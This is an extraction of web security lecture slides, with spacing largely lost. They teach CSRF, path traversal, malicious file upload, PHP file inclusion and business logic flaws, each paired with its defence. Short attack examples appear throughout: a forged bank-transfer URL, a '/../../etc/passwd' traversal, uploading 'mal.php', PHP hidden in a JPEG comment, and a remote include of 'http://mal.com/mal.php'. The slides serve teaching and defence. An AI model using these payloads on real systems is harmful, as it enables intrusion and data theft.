Web CSRF and Attacks - pdfs.semanticscholar.org€¦ · CSRF Server-Side Defenses •Synchronizer...
Transcript of Web CSRF and Attacks - pdfs.semanticscholar.org€¦ · CSRF Server-Side Defenses •Synchronizer...
WebSecurityCross-SiteRequestForgery
AttacksonServers
28/02/17 Web Security 1
Cross-SiteRequestForgery
Cross-SiteRequestForgery(CSRF)• Maliciouswebsitehasscriptthatredirectsandissuesarequestontargetwebsite– E.g.,document.location =“https://bank.com/wiretransfer.php?amount=10000&recipient=Attacker&account=2567”
• Ifuserisalreadyloggedinontargetwebsite…• Requestisexecutedbytargetwebsiteonbehalfofuser
– E.g.,fundsaretransferredfromtheusertotheattacker
28/02/17 Web Security 3
LoginCSRF• Malicioussiteincludeslinkorformthatlogsinvictimwithattacker’saccountonCSRFvulnerablesite
• Subsequentvictim’sinteractionwithCSRFvulnerablesiteissharedwithattacker– Navigationinvulnerablesite– Datasuppliedtovulnerablesite– …
28/02/17 Web Security 4
CSRFTrustRelationship
• Vulnerablesitetrustsuser(login)
• Usertrustsevilsite
• Evilsitecouldbehackedlegitimatesite
28/02/17 Web Security 5
Victim’sBrowser
CSRFVulnerableWebsite
EvilWebsite
MaliciousRequest
LegitimateRequest
Login
CSRFServer-SideDefenses• Synchronizertoken
– RandomtokenembeddedbyserverinallHTMLformsandverifiedbyserver
– CSRFrequestrejectedbecauseattackercannotguesstoken
• CustomHTTPheader– Onlogin,websitesetsacookiecontainingrandomvalue– ClientsidescriptreadscookieandcopiesitintocustomHTTPheadersentwitheachtransactionalrequest
– SecuritybasedonbrowsernottransmittingcustomHTTPheadersacrossdifferentservers
28/02/17 Web Security 6
FirefoxAdd-onRequestPolicy(RP)
• RPsetsdefaultdenypolicyforcross-siterequests
• Cross-siterequestsarethosemadetoasitedifferentfromcurrentone
• RPallowstowhitelistcross-siterequestsbyoriginand/ordestinationsite
28/02/17 Web Security 7
ImproperPathSanitization
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
ImproperPathSanitization
• Problem:onlysomepathsarevalid;whichones?
• Improperpathsanitizationcanleadtodisallowedresourcesbeingaccessed
• Whatsortsofresources/pathsmightwewanttomakeoff-limits?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
ImproperPathSanitization
• Whatsortsofresources/pathsmightwewanttomakeoff-limits?
–Configurationfiles(e.g.,Apache’s.htaccess)–Filesoutsidethewebroot–Filesoutsidetheuploaddirectory–etc
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
ImproperPathSanitization
• Attempt#1:Blacklists–e.g.,“/foo/bar isofflimits”
• What’swrongwiththis?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
ImproperPathSanitization
• Attempt#1:Blacklists–e.g.,“/foo/bar isofflimits”
• What’swrongwiththis?–Multiplepathscanrefertothesameresource– /foo/bar– /foo//bar– /foo/../foo/bar– /foo/bar/baz/..
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
ImproperPathSanitization
• Attempt#1:Blacklists–e.g.,“/foo/bar isofflimits”
• What’swrongwiththis?–Whataboutpathsoutsidethewebroot?– /../../etc/passwd– Becomes/var/www/../../etc/passwd– (e.g.,/etc/passwd)
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
ImproperPathSanitization
• Attempt#2:Whitelists–e.g.,“only/foo/bar or/baz/blah areallowed”
• What’swrongwiththis?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
ImproperPathSanitization
• Attempt#2:Whitelists–e.g.,“only/foo/bar or/baz/blah areallowed”
• What’swrongwiththis?–Howtokeepthewhitelistuptodate?–Howtobenicetousers
• e.g.,/foo//bar isreally/foo/bar
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
ImproperPathSanitization
• Attempt#3:ParsePaths–e.g.,determinethatfoo.com/bar doesn’tescapewebroot
• What’swrongwiththis?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
ImproperPathSanitization
• Attempt#3:ParsePaths–e.g.,determinethatfoo.com/bar doesn’tescapewebroot
• What’swrongwiththis?–Correctparsingishard
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
ImproperPathSanitization
• Solution–Whenpossible,useexistingimplementations
• Apachedoesthiscorrectly- useit
–Forcustomlogic,don’tusepaths• Storedataindatabases• Don’tusesubfolders
– e.g.,/var/uploads,my-upload.pdf– filterbadcharacters(/, \0)orbadnames(.., .)
FileUpload
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload
• Apache’sPHPpluginwillexecute*.php• Whathappensifthere’sanuploaddirectoryinsidethewebroot?
–e.g.,/var/www/upload
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload
• Apache’sPHPpluginwillexecute*.php• Whathappensifthere’sanuploaddirectoryinsidethewebroot?
–e.g.,/var/www/upload• Uploadmal.php• Visitfoo.com/upload/mal.php• Profit!
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload
• Howtofix?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload
• Attempt#1:Disallow.php extension• Whatcouldgowrong?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload
• Attempt#1:Disallow.php extension• Whatcouldgowrong?
–WhatifIwanttouploadaPHPfile?–Notsufficientforsomeconfigurations...
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload
<!-- date.html --><html><head><title>My Page</title></head><body>
<p>Date: <?php echo date(); ?></p></body></html>
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload
• Uploadfoo.html:<html>
<?php do_bad_thing(); ?></html>
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload
• Uploadfoo.html:<html>
<?php do_bad_thing(); ?></html>
• Howtofix?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload
• Attempt#2:Disallow*.php,*.html• And verifythatit’saproperlyformattedfile• Forexample,limittothesefiletypes:
–JPEG–PDF
• Whatcouldgowrong?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload
• Whatcouldgowrong?–JPEGsupportscomments,soembedPHPinJPEGcommentfield
–Evenifitdidn’t,wecouldstillcrafttherightpixelsequences:\x3C\x3F\x70\x68\x70 - <?php \x3F\x3E - ?>
• Howtofix?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileUpload• Solution:don’tservefilesdirectly• Bad:foo.com/upload/foo.pdf• Good:foo.com/get.php?file=foo.pdf• Implementcustomlogicinget.php• Don’tallowaccesstouploaddirectory
– Storeoutsideofwebroot– Ifthat’snotpossible,use.htaccess orsimilar
• Watchoutforpathvulnerabilities,though!
FileInclusion
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileInclusion• PHP(andotherlanguages)allowdynamicincludes
include(‘lib.php’); • Imagineasitewithdynamically-generatedinclude:
lang = $_GET[‘lang’];include($lang . ‘.php’);
• Whatcouldgowrong?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileInclusion• Let’ssaythere’sanadd-user.php
– Onlyincludedafterauthenticationasadmin– Can’tloaddirectly- foo.com/add-user.php
• Visitfoo.com/blah.php?lang=add-user&user=mallory&pass=l337hax0r
• Makestheinclude:include(‘add-user.php’);
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileInclusion• Canwedobetter?• ManyPHPfunctionstreatpathsasbeingfilepathsor
URLs…• Whatcouldgowrong?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileInclusion• Canwedobetter?• ManyPHPfunctionstreatpathsasbeingfilepathsor
URLs…• Whatcouldgowrong?
– foo.com/blah.php?lang=http://mal.com/mal• Makestheinclude:
include(‘http://mal.com/mal.php’);
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileInclusion
• Solution?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
FileInclusion
• Solution– Ifyouneedtodynamicallyincludefiles,keepapre-setlist:lang_files = array(‘en-US’ => ‘en-us.php’,‘en-GB’ => ‘en-GB.php’,‘en-l337’ => ‘en-l337.php’);
BusinessLogicFlaws
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
BusinessLogicFlaws
• “Businesslogic”isthehigh-levellogicbehindawebapplication’sfunctionality–E.g.,“Ausermustpaybeforehavinganitemshippedtothem”
• Flawsintheimplementationofthislogic(orflawsinthelogicitself)canbeserious
• Chapter11ofWAHH
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
BusinessLogicFlaws
• Oftencomefromamismatchbetweendeveloperassumptionsandreality
• Sincetheydifferwidely,besttogiveexamples• Thesearerealexamplesfromrealapplications
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
BusinessLogicFlaws
• Example1:CheatingonBulkDiscounts–Siteoffersbulkdiscountsongroupofitems–Whenanewitemisaddedtothecart,ifabulkdiscountapplies,thepricesofallitemsareloweredappropriately
–Whatcouldgowrong?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
BusinessLogicFlaws
• Example1:CheatingonBulkDiscounts–Siteoffersbulkdiscountsongroupofitems–Whenanewitemisaddedtothecart,ifabulkdiscountapplies,thepricesofallitemsareloweredappropriately
–Whatcouldgowrong?– Addmanyitemstothecart,loweringprices– Deletemostofthem,checkoutwithacheapitem
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
BusinessLogicFlaws
• Example2:ProceedingtoCheckout– Inashoppingcartapplication,whencheckingout,userisdirectedthroughaseriesofpages:
• Fromcart,click“checkout”button• Redirectedtopagetoenterpaymentdetails• Ifpaymentverifies,redirectedtoshippingdetails• Aftershippingdetailsverified,orderiscomplete• Whatcouldgowrong?
© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166
BusinessLogicFlaws
• Example2:ProceedingtoCheckout– Inashoppingcartapplication,whencheckingout,userisdirectedthroughaseriesofpages:
• Fromcart,click“checkout”button• Redirectedtopagetoenterpaymentdetails• Ifpaymentverifies,redirectedtoshippingdetails• Aftershippingdetailsverified,orderiscomplete• Whatcouldgowrong?• Godirectlytoenteringshippingdetails,skippayment